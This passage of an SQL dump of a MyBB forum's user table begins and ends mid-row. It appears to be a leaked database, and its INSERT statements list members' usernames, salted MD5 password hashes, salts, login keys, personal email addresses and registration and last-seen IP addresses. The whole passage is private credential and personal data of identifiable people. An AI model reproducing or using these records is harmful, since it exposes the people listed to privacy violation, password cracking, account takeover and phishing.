Items$%%$3**Drafts$%%$4**Trash Can', '', '0', '0', '0', '129.121.100.27', '129.121.101.56', '-2122750949', '-2122750664', '', '9', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', '', 'b:0;', '0', '1'); INSERT INTO `mybb_users` (`uid`, `username`, `password`, `salt`, `loginkey`, `email`, `postnum`, `avatar`, `avatardimensions`, `avatartype`, `usergroup`, `additionalgroups`, `displaygroup`, `usertitle`, `regdate`, `lastactive`, `lastvisit`, `lastpost`, `website`, `icq`, `aim`, `yahoo`, `msn`, `birthday`, `birthdayprivacy`, `signature`, `allownotices`, `hideemail`, `subscriptionmethod`, `invisible`, `receivepms`, `receivefrombuddy`, `pmnotice`, `pmnotify`, `threadmode`, `showsigs`, `showavatars`, `showquickreply`, `showredirect`, `ppp`, `tpp`, `daysprune`, `dateformat`, `timeformat`, `timezone`, `dst`, `dstcorrection`, `buddylist`, `ignorelist`, `style`, `away`, `awaydate`, `returndate`, `awayreason`, `pmfolders`, `notepad`, `referrer`, `referrals`, `reputation`, `regip`, `lastip`, `longregip`, `longlastip`, `language`, `timeonline`, `showcodebuttons`, `totalpms`, `unreadpms`, `warningpoints`, `moderateposts`, `moderationtime`, `suspendposting`, `suspensiontime`, `suspendsignature`, `suspendsigtime`, `coppauser`, `classicpostbit`, `loginattempts`, `failedlogin`, `usernotes`, `privatewarning`, `achivements`, `threads`, `forcepwchange`) VALUES ('246', 'The Anarchist', 'd79c651f9dcc00013135dd77a9f9a8e5', 'VYiIWNc3', 'JLX2Rg5SJ2NnemIZW44qtvEbpFzICOOgM9KQyMBdVkJAT2xmSO', 'troll@nomail.xl.cx', '9', '', '', '', '10', '', '0', '', '1349751769', '1351537415', '1351466025', '1349824722', '', '', '', '', '', '', 'all', '', '1', '0', '0', '0', '1', '0', '2', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '0', '0', '-4', '0', '2', '', '', '0', '0', '0', '0', '', '1**Inbox$%%$2**Sent Items$%%$3**Drafts$%%$4**Trash Can', '', '0', '0', '0', '108.171.103.234', '72.231.24.165', '1823172586', '1223104677', '', '13804', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', '', 'b:0;', '0', '0'); INSERT INTO `mybb_users` (`uid`, `username`, `password`, `salt`, `loginkey`, `email`, `postnum`, `avatar`, `avatardimensions`, `avatartype`, `usergroup`, `additionalgroups`, `displaygroup`, `usertitle`, `regdate`, `lastactive`, `lastvisit`, `lastpost`, `website`, `icq`, `aim`, `yahoo`, `msn`, `birthday`, `birthdayprivacy`, `signature`, `allownotices`, `hideemail`, `subscriptionmethod`, `invisible`, `receivepms`, `receivefrombuddy`, `pmnotice`, `pmnotify`, `threadmode`, `showsigs`, `showavatars`, `showquickreply`, `showredirect`, `ppp`, `tpp`, `daysprune`, `dateformat`, `timeformat`, `timezone`, `dst`, `dstcorrection`, `buddylist`, `ignorelist`, `style`, `away`, `awaydate`, `returndate`, `awayreason`, `pmfolders`, `notepad`, `referrer`, `referrals`, `reputation`, `regip`, `lastip`, `longregip`, `longlastip`, `language`, `timeonline`, `showcodebuttons`, `totalpms`, `unreadpms`, `warningpoints`, `moderateposts`, `moderationtime`, `suspendposting`, `suspensiontime`, `suspendsignature`, `suspendsigtime`, `coppauser`, `classicpostbit`, `loginattempts`, `failedlogin`, `usernotes`, `privatewarning`, `achivements`, `threads`, `forcepwchange`) VALUES ('149', 'cycoshas', '4c4022288d0abf8e7ca3a906c9507c47', '1ubztUDb', 'xY8wJpG7mUYYSlCbanMAmZ1KnZ4oT74jMELxS7AUgWMLqnJpLr', 'germanshashank@gmail.com', '0', '', '', '', '2', '', '0', '', '1346318204', '1346318204', '1346318204', '0', '', '0', '', '', '', '', 'all', '', '1', '0', '0', '0', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-4', '0', '2', '', '', '10', '0', '0', '0', '', '', '', '0', '0', '0', '122.176.223.235', '', '2058412011', '0', '', '0', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', '', 'b:0;', '0', '1'); INSERT INTO `mybb_users` (`uid`, `username`, `password`, `salt`, `loginkey`, `email`, `postnum`, `avatar`, `avatardimensions`, `avatartype`, `usergroup`, `additionalgroups`, `displaygroup`, `usertitle`, `regdate`, `lastactive`, `lastvisit`, `lastpost`, `website`, `icq`, `aim`, `yahoo`, `msn`, `birthday`, `birthdayprivacy`, `signature`, `allownotices`, `hideemail`, `subscriptionmethod`, `invisible`, `receivepms`, `receivefrombuddy`, `pmnotice`, `pmnotify`, `threadmode`, `showsigs`, `showavatars`, `showquickreply`, `showredirect`, `ppp`, `tpp`, `daysprune`, `dateformat`, `timeformat`, `timezone`, `dst`, `dstcorrection`, `buddylist`, `ignorelist`, `style`, `away`, `awaydate`, `returndate`, `awayreason`, `pmfolders`, `notepad`, `referrer`, `referrals`, `reputation`, `regip`, `lastip`, `longregip`, `longlastip`, `language`, `timeonline`, `showcodebuttons`, `totalpms`, `unreadpms`, `warningpoints`, `moderateposts`, `moderationtime`, `suspendposting`, `suspensiontime`, `suspendsignature`, `suspendsigtime`, `coppauser`, `classicpostbit`, `loginattempts`, `failedlogin`, `usernotes`, `privatewarning`, `achivements`, `threads`, `forcepwchange`) VALUES ('150', 'MinecraftGeek', 'a1242317c4c314442ca201802c261b7c', 'widjJEBi', 'EEVm5h57CklBkUnn2Mdoy7KbE5xDjdScygZcBk8uMVJA6ttAWm', 'liamsidney12@ymail.com', '10', '', '', '', '2', '', '0', '', '1346344506', '1352823062', '1352508525', '1352823143', '', '0', '', '', '', '', 'all', '', '1', '0', '0', '0', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '0', '0', '-4', '0', '2', '', '', '10', '0', '0', '0', '', '1**$%%$2**$%%$3**$%%$4**', '', '0', '0', '0', '86.161.179.151', '81.151.0.106', '1453437847', '1368850538', '', '10383', '1', '3', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', '', 'b:0;', '0', '0'); INSERT INTO `mybb_users` (`uid`, `username`, `password`, `salt`, `loginkey`, `email`, `postnum`, `avatar`, `avatardimensions`, `avatartype`, `usergroup`, `additionalgroups`, `displaygroup`, `usertitle`, `regdate`, `lastactive`, `lastvisit`, `lastpost`, `website`, `icq`, `aim`, `yahoo`, `msn`, `birthday`, `birthdayprivacy`, `signature`, `allownotices`, `hideemail`, `subscriptionmethod`, `invisible`, `receivepms`, `receivefrombuddy`, `pmnotice`, `pmnotify`, `threadmode`, `showsigs`, `showavatars`, `showquickreply`, `showredirect`, `ppp`, `tpp`, `daysprune`, `dateformat`, `timeformat`, `timezone`, `dst`, `dstcorrection`, `buddylist`, `ignorelist`, `style`, `away`, `awaydate`, `returndate`, `awayreason`, `pmfolders`, `notepad`, `referrer`, `referrals`, `reputation`, `regip`, `lastip`, `longregip`, `longlastip`, `language`, `timeonline`, `showcodebuttons`, `totalpms`, `unreadpms`, `warningpoints`, `moderateposts`, `moderationtime`, `suspendposting`, `suspensiontime`, `suspendsignature`, `suspendsigtime`, `coppauser`, `classicpostbit`, `loginattempts`, `failedlogin`, `usernotes`, `privatewarning`, `achivements`, `threads`, `forcepwchange`) VALUES ('151', 'r3dd3v1l5', '59b96234607ffc84bc2ae890ac120459', 'lJyAZukd', 'ShhgZO4ymM1pv35Bil7OMZ1PUkyWPfuyRxPKB4WPGAUy125Uxi', 'redjzuzzj@gmail.com', '0', '', '', '', '2', '', '0', '', '1346345209', '1346346477', '1346345209', '0', '', '0', '', '', '', '', 'all', '', '1', '1', '0', '1', '1', '0', '2', '1', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-4', '0', '2', '', '', '10', '0', '0', '0', '', '', '', '0', '0', '0', '60.52.87.169', '60.52.87.169', '1010063273', '1010063273', '', '1268', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', '', 'b:0;', '0', '1'); INSERT INTO `mybb_users` (`uid`, `username`, `password`, `salt`, `loginkey`, `email`, `postnum`, `avatar`, `avatardimensions`, `avatartype`, `usergroup`, `additionalgroups`, `displaygroup`, `usertitle`, `regdate`, `lastactive`, `lastvisit`, `lastpost`, `website`, `icq`, `aim`, `yahoo`, `msn`, `birthday`, `birthdayprivacy`, `signature`, `allownotices`, `hideemail`, `subscriptionmethod`, `invisible`, `receivepms`, `receivefrombuddy`, `pmnotice`, `pmnotify`, `threadmode`, `showsigs`, `showavatars`, `showquickreply`, `showredirect`, `ppp`, `tpp`, `daysprune`, `dateformat`, `timeformat`, `timezone`, `dst`, `dstcorrection`, `buddylist`, `ignorelist`, `style`, `away`, `awaydate`, `returndate`, `awayreason`, `pmfolders`, `notepad`, `referrer`, `referrals`, `reputation`, `regip`, `lastip`, `longregip`, `longlastip`, `language`, `timeonline`, `showcodebuttons`, `totalpms`, `unreadpms`, `warningpoints`, `moderateposts`, `moderationtime`, `suspendposting`, `suspensiontime`, `suspendsignature`, `suspendsigtime`, `coppauser`, `classicpostbit`, `loginattempts`, `failedlogin`, `usernotes`, `privatewarning`, `achivements`, `threads`, `forcepwchange`) VALUES ('153', 'lemans123', '8752c5671bf8cd6867c6685231e35bcf', '1qibuenB', '2pfR5wsIpyOIIqX2twEQ2FZFwazreMSVy8h3t8f8wv8w2M6RLk', 'stave_123@hotmail.com', '0', '', '', '', '2', '', '0', '', '1346349286', '1346361446', '1346359499', '0', '', '0', '', '', '', '', 'all', '', '1', '0', '0', '0', '1', '0', '2', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-8', '1', '2', '', '', '10', '0', '0', '0', '', '', '', '0', '0', '0', '173.245.52.108', '173.245.52.108', '-1376439188', '-1376439188', '', '1391', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', '', 'b:0;', '0', '1'); INSERT INTO `mybb_users` (`uid`, `username`, `password`, `salt`, `loginkey`, `email`, `postnum`, `avatar`, `avatardimensions`, `avatartype`, `usergroup`, `additionalgroups`, `displaygroup`, `usertitle`, `regdate`, `lastactive`, `lastvisit`, `lastpost`, `website`, `icq`, `aim`, `yahoo`, `msn`, `birthday`, `birthdayprivacy`, `signature`, `allownotices`, `hideemail`, `subscriptionmethod`, `invisible`, `receivepms`, `receivefrombuddy`, `pmnotice`, `pmnotify`, `threadmode`, `showsigs`, `showavatars`, `showquickreply`, `showredirect`, `ppp`, `tpp`, `daysprune`, `dateformat`, `timeformat`, `timezone`, `dst`, `dstcorrection`, `buddylist`, `ignorelist`, `style`, `away`, `awaydate`, `returndate`, `awayreason`, `pmfolders`, `notepad`, `referrer`, `referrals`, `reputation`, `regip`, `lastip`, `longregip`, `longlastip`, `language`, `timeonline`, `showcodebuttons`, `totalpms`, `unreadpms`, `warningpoints`, `moderateposts`, `moderationtime`, `suspendposting`, `suspensiontime`, `suspendsignature`, `suspendsigtime`, `coppauser`, `classicpostbit`, `loginattempts`, `failedlogin`, `usernotes`, `privatewarning`, `achivements`, `threads`, `forcepwchange`) VALUES ('157', 'Kin', '244626c86c86eb80ae596e33067719b3', 'EHLqJ25X', 'K3eimLdUnghJu2AobOg7gPInBpSAzBNZPbg5Cnv92t9aKN8slr', 'Kin_Track@yahoo.com', '0', '', '', '', '14', '', '0', '', '1346374246', '1346374246', '1346374246', '0', '', '0', '', '', '', '', 'all', '', '1', '0', '0', '0', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-4', '0', '2', '', '', '10', '0', '0', '0', '', '', '', '0', '0', '0', '197.251.130.199', '', '-973372729', '0', '', '0', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', '', 'b:0;', '0', '0'); INSERT INTO `mybb_users` (`uid`, `username`, `password`, `salt`, `loginkey`, `email`, `postnum`, `avatar`, `avatardimensions`, `avatartype`, `usergroup`, `additionalgroups`, `displaygroup`, `usertitle`, `regdate`, `lastactive`, `lastvisit`, `lastpost`, `website`, `icq`, `aim`, `yahoo`, `msn`, `birthday`, `birthdayprivacy`, `signature`, `allownotices`, `hideemail`, `subscriptionmethod`, `invisible`, `receivepms`, `receivefrombuddy`, `pmnotice`, `pmnotify`, `threadmode`, `showsigs`, `showavatars`, `showquickreply`, `showredirect`, `ppp`, `tpp`, `daysprune`, `dateformat`, `timeformat`, `timezone`, `dst`, `dstcorrection`, `buddylist`, `ignorelist`, `style`, `away`, `awaydate`, `returndate`, `awayreason`, `pmfolders`, `notepad`, `referrer`, `referrals`, `reputation`, `regip`, `lastip`, `longregip`, `longlastip`, `language`, `timeonline`, `showcodebuttons`, `totalpms`, `unreadpms`, `warningpoints`, `moderateposts`, `moderationtime`, `suspendposting`, `suspensiontime`, `suspendsignature`, `suspendsigtime`, `coppauser`, `classicpostbit`, `loginattempts`, `failedlogin`, `usernotes`, `privatewarning`, `achivements`, `threads`, `forcepwchange`) VALUES ('158', 'Breezy', '5775ceda6392361651972a27a22c69d3', 'qTwX3lvP', 'dAjGUC3YEbxy3fIG86BgjUudOkC8skcrz83VSy7rHKQvf29qrm', 'drebig32@yahoo.com', '0', '', '', '', '2', '', '0', '', '1346376902', '1346719969', '1346473349', '0', '', '0', '', '', '', '', 'all', '', '1', '0', '0', '0', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '0', '0', '-4', '0', '2', '', '', '10', '0', '0', '0', '', '1**Inbox$%%$2**Sent Items$%%$3**Drafts$%%$4**Trash Can', '', '1', '0', '0', '68.40.229.156', '68.40.229.156', '1143530908', '1143530908', '', '1762', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', '', 'b:0;', '0', '1'); INSERT INTO `mybb_users` (`uid`, `username`, `password`, `salt`, `loginkey`, `email`, `postnum`, `avatar`, `avatardimensions`, `avatartype`, `usergroup`, `additionalgroups`, `displaygroup`, `usertitle`, `regdate`, `lastactive`, `lastvisit`, `lastpost`, `website`, `icq`, `aim`, `yahoo`, `msn`, `birthday`, `birthdayprivacy`, `signature`, `allownotices`, `hideemail`, `subscriptionmethod`, `invisible`, `receivepms`, `receivefrombuddy`, `pmnotice`, `pmnotify`, `threadmode`, `showsigs`, `showavatars`, `showquickreply`, `showredirect`, `ppp`, `tpp`, `daysprune`, `dateformat`, `timeformat`, `timezone`, `dst`, `dstcorrection`, `buddylist`, `ignorelist`, `style`, `away`, `awaydate`, `returndate`, `awayreason`, `pmfolders`, `notepad`, `referrer`, `referrals`, `reputation`, `regip`, `lastip`, `longregip`, `longlastip`, `language`, `timeonline`, `showcodebuttons`, `totalpms`, `unreadpms`, `warningpoints`, `moderateposts`, `moderationtime`, `suspendposting`, `suspensiontime`, `suspendsignature`, `suspendsigtime`, `coppauser`, `classicpostbit`, `loginattempts`, `failedlogin`, `usernotes`, `privatewarning`, `achivements`, `threads`, `forcepwchange`) VALUES ('159', 'Victori0us', 'ea0b80c55d84e24f3bb9b985ec87b2bf', 'WRbPCyvb', 'FIwKbEu6jHtjO3sMo9MtTLaMC2JwTh5uaffEVuTW8adEAmoJoR', 'Narrative@live.com', '1', '', '', '', '2', '', '0', '', '1346419210', '1347329499', '1346596694', '1346419973', '', '0', '', '', '', '', 'all', '', '1', '0', '0', '0', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '0', '0', '-4', '0', '2', '', '', '10', '0', '0', '0', '', '1**$%%$2**$%%$3**$%%$4**', '', '0', '0', '0', '65.27.123.23', '72.229.164.105', '1092320023', '1223009385', '', '2566', '1', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', '', 'b:0;', '1', '1'); INSERT INTO `mybb_users` (`uid`, `username`, `password`, `salt`, `loginkey`, `email`, `postnum`, `avatar`, `avatardimensions`, `avatartype`, `usergroup`, `additionalgroups`, `displaygroup`, `usertitle`, `regdate`, `lastactive`, `lastvisit`, `lastpost`, `website`, `icq`, `aim`, `yahoo`, `msn`, `birthday`, `birthdayprivacy`, `signature`, `allownotices`, `hideemail`, `subscriptionmethod`, `invisible`, `receivepms`, `receivefrombuddy`, `pmnotice`, `pmnotify`, `threadmode`, `showsigs`, `showavatars`, `showquickreply`, `showredirect`, `ppp`, `tpp`, `daysprune`, `dateformat`, `timeformat`, `timezone`, `dst`, `dstcorrection`, `buddylist`, `ignorelist`, `style`, `away`, `awaydate`, `returndate`, `awayreason`, `pmfolders`, `notepad`, `referrer`, `referrals`, `reputation`, `regip`, `lastip`, `longregip`, `longlastip`, `language`, `timeonline`, `showcodebuttons`, `totalpms`, `unreadpms`, `warningpoints`, `moderateposts`, `moderationtime`, `suspendposting`, `suspensiontime`, `suspendsignature`, `suspendsigtime`, `coppauser`, `classicpostbit`, `loginattempts`, `failedlogin`, `usernotes`, `privatewarning`, `achivements`, `threads`, `forcepwchange`) VALUES ('160', 'Jacob', 'ec9b22bce5c1bd7084386e1830f747e1', 'Xq6dAB2i', 'DAGOxvptylYepwEloKGRRnKzNVkwNkzpehVm4mbl2kGgkG2CrH', 'jakubczachor418@gmail.com', '18', '', '', '', '2', '', '0', '', '1346420403', '1352326739', '1352239722', '1352238599', '', '0', '', '', '', '', 'all', '[img]http://i.imgur.com/GgQJx.jpg[/img]', '0', '0', '0', '0', '1', '0', '0', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '0', '0', '-4', '1', '2', '', '', '10', '0', '0', '0', '', '1**$%%$2**$%%$3**$%%$4**', '', '0', '0', '3', '142.255.31.241', '142.255.31.241', '-1895882767', '-1895882767', '', '28173', '1', '7', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', '', 'b:0;', '0', '1'); INSERT INTO `mybb_users` (`uid`, `username`, `password`, `salt`, `loginkey`, `email`, `postnum`, `avatar`, `avatardimensions`, `avatartype`, `usergroup`, `additionalgroups`, `displaygroup`, `usertitle`, `regdate`, `lastactive`, `lastvisit`, `lastpost`, `website`, `icq`, `aim`, `yahoo`, `msn`, `birthday`, `birthdayprivacy`, `signature`, `allownotices`, `hideemail`, `subscriptionmethod`, `invisible`, `receivepms`, `receivefrombuddy`, `pmnotice`, `pmnotify`, `threadmode`, `showsigs`, `showavatars`, `showquickreply`, `showredirect`, `ppp`, `tpp`, `daysprune`, `dateformat`, `timeformat`, `timezone`, `dst`, `dstcorrection`, `buddylist`, `ignorelist`, `style`, `away`, `awaydate`, `returndate`, `awayreason`, `pmfolders`, `notepad`, `referrer`, `referrals`, `reputation`, `regip`, `lastip`, `longregip`, `longlastip`, `language`, `timeonline`, `showcodebuttons`, `totalpms`, `unreadpms`, `warningpoints`, `moderateposts`, `moderationtime`, `suspendposting`, `suspensiontime`, `suspendsignature`, `suspendsigtime`, `coppauser`, `classicpostbit`, `loginattempts`, `failedlogin`, `usernotes`, `privatewarning`, `achivements`, `threads`, `forcepwchange`) VALUES ('161', 'crankynurse', '674c4a13b027b32185a62cda8e65b43f', 'HUfTzZ7F', 'GrjZQqtCvh1m37mKm4g22tIP7usDWkWDaISTYixh8xDGIcozq9', 'hugheschristian25@yahoo.com', '0', '', '', '', '2', '', '0', '', '1346434237', '1346781406', '1346436558', '0', '', '0', '', '', '', '', 'all', '', '1', '1', '0', '0', '1', '0', '1', '1', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-4', '1', '2', '', '', '10', '0', '0', '0', '', '', '', '0', '0', '0', '164.58.144.196', '164.58.144.196', '-1539665724', '-1539665724', '', '994', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', '', 'b:0;', '0', '1'); INSERT INTO `mybb_users` (`uid`, `username`, `password`, `salt`, `loginkey`, `email`, `postnum`, `avatar`, `avatardimensions`, `avatartype`, `usergroup`, `additionalgroups`, `displaygroup`, `usertitle`, `regdate`, `lastactive`, `lastvisit`, `lastpost`, `website`, `icq`, `aim`, `yahoo`, `msn`, `birthday`, `birthdayprivacy`, `signature`, `allownotices`, `hideemail`, `subscriptionmethod`, `invisible`, `receivepms`, `receivefrombuddy`, `pmnotice`, `pmnotify`, `threadmode`, `showsigs`, `showavatars`, `showquickreply`, `showredirect`, `ppp`, `tpp`, `daysprune`, `dateformat`, `timeformat`, `timezone`, `dst`, `dstcorrection`, `buddylist`, `ignorelist`, `style`, `away`, `awaydate`, `returndate`, `awayreason`, `pmfolders`, `notepad`, `referrer`, `referrals`, `reputation`, `regip`, `lastip`, `longregip`, `longlastip`, `language`, `timeonline`, `showcodebuttons`, `totalpms`, `unreadpms`, `warningpoints`, `moderateposts`, `moderationtime`, `suspendposting`, `suspensiontime`, `suspendsignature`, `suspendsigtime`, `coppauser`, `classicpostbit`, `loginattempts`, `failedlogin`, `usernotes`, `privatewarning`, `achivements`, `threads`, `forcepwchange`) VALUES ('162', 'Dingus', 'fd84bd600494f353bb3538b375d2d5b1', '3we1cDwE', 'QJeS2fZAnWCnjYcjvkKPqvQKy19KPOrhoHXRktwXc1svtA1LlP', 'dinguss024@gmail.com', '3', '', '', '', '2', '', '0', '', '1346458736', '1346704796', '1346650739', '1346459591', '', '0', '', '', '', '', 'all', '', '1', '0', '0', '0', '1', '0', '2', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '0', '0', '-4', '1', '2', '', '', '10', '0', '0', '0', '', '', '', '0', '0', '0', '209.188.74.94', '209.188.74.94', '-776189346', '-776189346', '', '4120', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', '', 'b:0;', '1', '1'); INSERT INTO `mybb_users` (`uid`, `username`, `password`, `salt`, `loginkey`, `email`, `postnum`, `avatar`, `avatardimensions`, `avatartype`, `usergroup`, `additionalgroups`, `displaygroup`, `usertitle`, `regdate`, `lastactive`, `lastvisit`, `lastpost`, `website`, `icq`, `aim`, `yahoo`, `msn`, `birthday`, `birthdayprivacy`, `signature`, `allownotices`, `hideemail`, `subscriptionmethod`, `invisible`, `receivepms`, `receivefrombuddy`, `pmnotice`, `pmnotify`, `threadmode`, `showsigs`, `showavatars`, `showquickreply`, `showredirect`, `ppp`, `tpp`, `daysprune`, `dateformat`, `timeformat`, `timezone`, `dst`, `dstcorrection`, `buddylist`, `ignorelist`, `style`, `away`, `awaydate`, `returndate`, `awayreason`, `pmfolders`, `notepad`, `referrer`, `referrals`, `reputation`, `regip`, `lastip`, `longregip`, `longlastip`, `language`, `timeonline`, `showcodebuttons`, `totalpms`, `unreadpms`, `warningpoints`, `moderateposts`, `moderationtime`, `suspendposting`, `suspensiontime`, `suspendsignature`, `suspendsigtime`, `coppauser`, `classicpostbit`, `loginattempts`, `failedlogin`, `usernotes`, `privatewarning`, `achivements`, `threads`, `forcepwchange`) VALUES ('165', 'sp454645', '9e13285b0059b799295b9af829da564c', 'zHh5apUE', 'Cl9ck2zVinLtjfSltFiv8FUNGOSPXQ76gBluevMJVQ68GGCumK', 'stevo6_p@hotmail.com', '0', '', '', '', '2', '', '0', '', '1346550380', '1346552886', '1346551202', '0', '', '0', '', '', '', '', 'all', '', '1', '0', '0', '0', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '10', '0', '2', '', '', '10', '0', '0', '0', '', '1**$%%$2**$%%$3**$%%$4**', '', '0', '0', '0', '123.243.70.203', '209.73.132.221', '2079540939', '-783711011', '', '1502', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', '', 'b:0;', '0', '1'); INSERT INTO `mybb_users` (`uid`, `username`, `password`, `salt`, `loginkey`, `email`, `postnum`, `avatar`, `avatardimensions`, `avatartype`, `usergroup`, `additionalgroups`, `displaygroup`, `usertitle`, `regdate`, `lastactive`, `lastvisit`, `lastpost`, `website`, `icq`, `aim`, `yahoo`, `msn`, `birthday`, `birthdayprivacy`, `signature`, `allownotices`, `hideemail`, `subscriptionmethod`, `invisible`, `receivepms`, `receivefrombuddy`, `pmnotice`, `pmnotify`, `threadmode`, `showsigs`, `showavatars`, `showquickreply`, `showredirect`, `ppp`, `tpp`, `daysprune`, `dateformat`, `timeformat`, `timezone`, `dst`, `dstcorrection`, `buddylist`, `ignorelist`, `style`, `away`, `awaydate`, `returndate`, `awayreason`, `pmfolders`, `notepad`, `referrer`, `referrals`, `reputation`, `regip`, `lastip`, `longregip`, `longlastip`, `language`, `timeonline`, `showcodebuttons`, `totalpms`, `unreadpms`, `warningpoints`, `moderateposts`, `moderationtime`, `suspendposting`, `suspensiontime`, `suspendsignature`, `suspendsigtime`, `coppauser`, `classicpostbit`, `loginattempts`, `failedlogin`, `usernotes`, `privatewarning`, `achivements`, `threads`, `forcepwchange`) VALUES ('164', 'otaq', 'cf6cfc1d3e5a1f475cd56d076b4430c3', 'bdGT2S7C', 'IgfODpmSBQJfOOF5tWkhD7UHfYGHguJ5I2gBxUhwm3TqDDo35K', 'adpe28@gmail.com', '0', '', '', '', '2', '', '0', '', '1346530216', '1346530403', '1346530216', '0', '', '0', '', '', '', '', 'all', '', '1', '0', '0', '0', '1', '0', '2', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-4', '1', '2', '', '', '10', '0', '0', '0', '', '', '', '0', '0', '0', '181.1.202.219', '181.1.202.219', '-1258173733', '-1258173733', '', '187', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', '', 'b:0;', '0', '1'); INSERT INTO `mybb_users` (`uid`, `username`, `password`, `salt`, `loginkey`, `email`, `postnum`, `avatar`, `avatardimensions`, `avatartype`, `usergroup`, `additionalgroups`, `displaygroup`, `usertitle`, `regdate`, `lastactive`, `lastvisit`, `lastpost`, `website`, `icq`, `aim`, `yahoo`, `msn`, `birthday`, `birthdayprivacy`, `signature`, `allownotices`, `hideemail`, `subscriptionmethod`, `invisible`, `receivepms`, `receivefrombuddy`, `pmnotice`, `pmnotify`, `threadmode`, `showsigs`, `showavatars`, `showquickreply`, `showredirect`, `ppp`, `tpp`, `daysprune`, `dateformat`, `timeformat`, `timezone`, `dst`, `dstcorrection`, `buddylist`, `ignorelist`, `style`, `away`, `awaydate`, `returndate`, `awayreason`, `pmfolders`, `notepad`, `referrer`, `referrals`, `reputation`, `regip`, `lastip`, `longregip`, `longlastip`, `language`, `timeonline`, `showcodebuttons`, `totalpms`, `unreadpms`, `warningpoints`, `moderateposts`, `moderationtime`, `suspendposting`, `suspensiontime`, `suspendsignature`, `suspendsigtime`, `coppauser`, `classicpostbit`, `loginattempts`, `failedlogin`, `usernotes`, `privatewarning`, `achivements`, `threads`, `forcepwchange`) VALUES ('167', '2wired', 'aaa16ecfa4b6242b7368582860109368', '48QzqrKm', 'luhCYfeklezWdWbNF97mBvttsCuBudztUAegnDPMi8Jl28MSY2', 'jbaylor@pfh.ie', '0', '', '', '', '2', '', '0', '', '1346689090', '1346689380', '1346689090', '0', '', '0', '', '', '', '', 'all', '', '1', '1', '2', '0', '1', '0', '0', '1', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-4', '0', '2', '', '', '10', '0', '0', '0', '', '1**$%%$2**$%%$3**$%%$4**', '', '0', '0', '0', '83.147.183.30', '83.147.183.30', '1402189598', '1402189598', '', '290', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', '', 'b:0;', '0', '1'); INSERT INTO `mybb_users` (`uid`, `username`, `password`, `salt`, `loginkey`, `email`, `postnum`, `avatar`, `avatardimensions`, `avatartype`, `usergroup`, `additionalgroups`, `displaygroup`, `usertitle`, `regdate`, `lastactive`, `lastvisit`, `lastpost`, `website`, `icq`, `aim`, `yahoo`, `msn`, `birthday`, `birthdayprivacy`, `signature`, `allownotices`, `hideemail`, `subscriptionmethod`, `invisible`, `receivepms`, `receivefrombuddy`, `pmnotice`, `pmnotify`, `threadmode`, `showsigs`, `showavatars`, `showquickreply`, `showredirect`, `ppp`, `tpp`, `daysprune`, `dateformat`, `timeformat`, `timezone`, `dst`, `dstcorrection`, `buddylist`, `ignorelist`, `style`, `away`, `awaydate`, `returndate`, `awayreason`, `pmfolders`, `notepad`, `referrer`, `referrals`, `reputation`, `regip`, `lastip`, `longregip`, `longlastip`, `language`, `timeonline`, `showcodebuttons`, `totalpms`, `unreadpms`, `warningpoints`, `moderateposts`, `moderationtime`, `suspendposting`, `suspensiontime`, `suspendsignature`, `suspendsigtime`, `coppauser`, `classicpostbit`, `loginattempts`, `failedlogin`, `usernotes`, `privatewarning`, `achivements`, `threads`, `forcepwchange`) VALUES ('166', '2112', '462606c90cb2cdf990f4c517ffdb308c', '9C1RlIQl', 'LVZrxqsXsQm169Zx34CMLOfhlErfJZ4bcIDJcTjWz149yKVb1b', 'Nathanielruizz@hotmail.com', '12', './uploads/avatars/avatar_166.gif?dateline=1346717343', '90|68', 'upload', '2', '', '0', 'Soliloquy', '1346646892', '1347422350', '1347318440', '1347114854', '', '0', '', '', '', '', 'all', '', '1', '0', '0', '0', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '0', '0', '-6', '1', '2', '', '', '10', '0', '0', '0', '', '1**Inbox$%%$2**Sent Items$%%$3**Drafts$%%$4**Trash Can', '', '0', '0', '10', '108.220.98.220', '108.220.98.220', '1826382556', '1826382556', '', '19445', '1', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', '', 'b:0;', '2', '1'); INSERT INTO `mybb_users` (`uid`, `username`, `password`, `salt`, `loginkey`, `email`, `postnum`, `avatar`, `avatardimensions`, `avatartype`, `usergroup`, `additionalgroups`, `displaygroup`, `usertitle`, `regdate`, `lastactive`, `lastvisit`, `lastpost`, `website`, `icq`, `aim`, `yahoo`, `msn`, `birthday`, `birthdayprivacy`, `signature`, `allownotices`, `hideemail`, `subscriptionmethod`, 